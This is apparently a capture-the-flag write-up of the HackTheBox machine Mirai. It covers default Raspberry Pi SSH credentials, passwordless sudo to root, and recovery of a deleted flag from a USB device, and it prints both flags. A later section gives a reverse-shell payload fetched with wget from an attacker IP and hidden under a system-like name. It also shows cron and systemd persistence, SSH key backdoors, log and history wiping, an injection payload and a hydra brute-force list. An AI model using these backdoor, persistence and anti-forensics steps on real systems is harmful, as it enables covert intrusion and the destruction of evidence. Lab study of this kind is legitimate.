Post

HackTheBox Mirai

Writeup for HackTheBox Mirai

HackTheBox Mirai

Machine Synopsis

Key Exploitation Techniques:

  • Default SSH credentials for IoT devices (Raspberry Pi)
  • Sudo misconfiguration (NOPASSWD: ALL) for immediate root access
  • File system forensics using df and strings for deleted data recovery
  • USB device analysis and data reconstruction

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nmap -sC -sV -A 10.10.10.48
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35

IoT Device Identification

Key Indicators:

  • dnsmasq DNS service (common on IoT devices)
  • lighttpd web server (lightweight, IoT-friendly)
  • SSH version patterns consistent with Raspberry Pi

Web Application Analysis

1
2
3
4
5
6
# Add hostname to resolve web interface
$ echo "10.10.10.48 mirai.htb" >> /etc/hosts

# Directory enumeration
$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
[21:05:29] 301 -   0B  - /admin  ->  http://mirai.htb/admin/

Accessing /admin reveals a Raspberry Pi dashboard/control interface, confirming IoT device identification.

Exploitation

website

Default Credential Testing

IoT devices, particularly Raspberry Pi systems, often retain default credentials:

Common Raspberry Pi Defaults:

  • pi:raspberry
  • pi:pi
  • admin:admin
1
2
3
4
5
6
7
8
# Test default SSH credentials
$ ssh pi@10.10.10.48
pi@10.10.10.48's password: raspberry

pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.4.50+ #970 Mon Feb 20 19:18:29 GMT 2017 armv6l GNU/Linux

Success: Default credentials pi:raspberry provide immediate SSH access.

User Flag Retrieval

1
2
3
4
5
6
pi@raspberrypi:~ $ ls
background.jpg  Documents  Music        Pictures  python_games  Videos
Desktop         Downloads  oldconffiles  Public    Templates

pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d

Privilege Escalation

Sudo Enumeration

1
2
3
4
5
6
7
8
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Critical Misconfiguration: User pi has unrestricted sudo access without password requirements.

Root Access

1
2
3
4
5
pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag Investigation

1
2
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Challenge: Original root flag has been deleted, backup exists on USB device.

Digital Forensics & Data Recovery

File System Analysis

1
2
3
4
5
6
7
8
9
10
11
# List mounted filesystems
root@raspberrypi:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/root        1.3G  1.1G  143M  89% /
devtmpfs        483M     0  483M   0% /dev
tmpfs           487M     0  487M   0% /dev/shm
tmpfs           487M   13M  475M   3% /run
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           487M     0  487M   0% /sys/fs/cgroup
/dev/mmcblk0p1   41M   21M   19M  53% /boot
/dev/sdb          8.7M   93K  7.9M   2% /media/usbstick

Key Finding: USB stick mounted at /media/usbstick (device /dev/sdb)

USB Device Investigation

1
2
3
4
5
6
7
8
9
10
11
12
13
root@raspberrypi:/# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found

root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Data Recovery using strings

1
2
3
4
5
6
7
8
9
10
11
12
# Use strings to recover deleted data from raw device
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Data Recovery Success: Root flag recovered: 3d3e483143ff12ec505d026fa13e020b

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

1
2
3
4
5
6
7
8
9
10
11
12
13
# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f mirai_persistence

# Install as pi user
# mkdir -p /home/pi/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /home/pi/.ssh/authorized_keys
# chmod 600 /home/pi/.ssh/authorized_keys
# chown pi:pi /home/pi/.ssh/authorized_keys

# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

Cron Backdoor

1
2
3
4
5
6
7
# Create reverse shell payload
$ msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor

# Install persistent cron job
# wget 10.10.14.6/backdoor -O /usr/bin/.system-update
# chmod +x /usr/bin/.system-update
# echo "*/15 * * * * /usr/bin/.system-update" >> /etc/crontab

Service Installation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Create systemd service for persistence
# cat > /etc/systemd/system/system-monitor.service << 'EOF'
[Unit]
Description=System Monitor Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/.system-update
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF

# Enable service
# systemctl enable system-monitor.service
# systemctl start system-monitor.service

Defense Evasion

Log Sanitization

1
2
3
4
5
6
7
8
9
10
11
12
13
# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/messages
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command histories
# > /root/.bash_history
# > /home/pi/.bash_history

# Clear DNS logs
# > /var/log/dnsmasq.log

Configuration Hardening (Anti-Forensics)

1
2
3
4
5
# Disable USB mounting
# echo "blacklist usb_storage" >> /etc/modprobe.d/blacklist.conf

# Secure deleted data
# dd if=/dev/urandom of=/dev/sdb bs=1M count=10

IoT-Specific Reconnaissance

Hardware Information

1
2
3
4
5
6
7
8
9
10
11
12
# Raspberry Pi model identification
# cat /proc/cpuinfo | grep -E "(Hardware|Revision|Model)"
Hardware        : BCM2835
Revision        : a02082
Model           : Raspberry Pi 3 Model B Rev 1.2

# GPIO pin status
# cat /sys/kernel/debug/gpio

# Temperature monitoring
# /opt/vc/bin/vcgencmd measure_temp
temp=42.8'C

Network Interface Analysis

1
2
3
4
5
6
7
# Wireless interface enumeration
# iwconfig
# iw dev

# Bluetooth devices
# hciconfig
# bluetoothctl list

IoT Service Discovery

1
2
3
4
5
6
7
8
# Check for IoT-specific services
# systemctl list-units | grep -E "(gpio|i2c|spi|uart)"

# Examine boot configuration
# cat /boot/config.txt | grep -v "^#"

# Check for camera module
# /opt/vc/bin/vcgencmd get_camera

Alternative Exploitation Methods

Web Interface Exploitation

1
2
3
4
5
6
7
# If admin panel is accessible, test for:
# - Default web credentials (admin:admin, admin:password)
# - Command injection in configuration forms
# - File upload vulnerabilities

$ curl -X POST http://mirai.htb/admin/config.php \
  -d "command=; id; #"

Brute Force Alternative Credentials

1
2
3
4
5
6
7
8
9
10
11
12
13
# Common IoT credential combinations
$ cat > iot_creds.txt << 'EOF'
pi:raspberry
pi:pi
admin:admin
admin:password
root:raspberry
root:root
user:user
EOF

# Automated SSH brute force
$ hydra -C iot_creds.txt ssh://10.10.10.48 -t 4

USB Forensics Alternative Methods

1
2
3
4
5
6
7
# Alternative data recovery tools
# photorec /dev/sdb    # GUI-based recovery
# testdisk /dev/sdb    # Partition recovery
# dd if=/dev/sdb | xxd | grep -A5 -B5 "root.txt"

# File carving with scalpel
# scalpel -b -o recovery_output /dev/sdb

Network Service Exploitation

1
2
3
4
5
6
7
# DNS service enumeration
$ dig @10.10.10.48 mirai.htb
$ nslookup mirai.htb 10.10.10.48

# HTTP service exploitation
$ nikto -h http://mirai.htb
$ dirb http://mirai.htb /usr/share/dirb/wordlists/common.txt

Hardware-Specific Attacks

1
2
3
4
5
# If physical access available:
# - SD card extraction and mounting
# - UART/Serial console access
# - GPIO manipulation for hardware backdoors
# - Boot process interruption

This post is licensed under CC BY 4.0 by the author.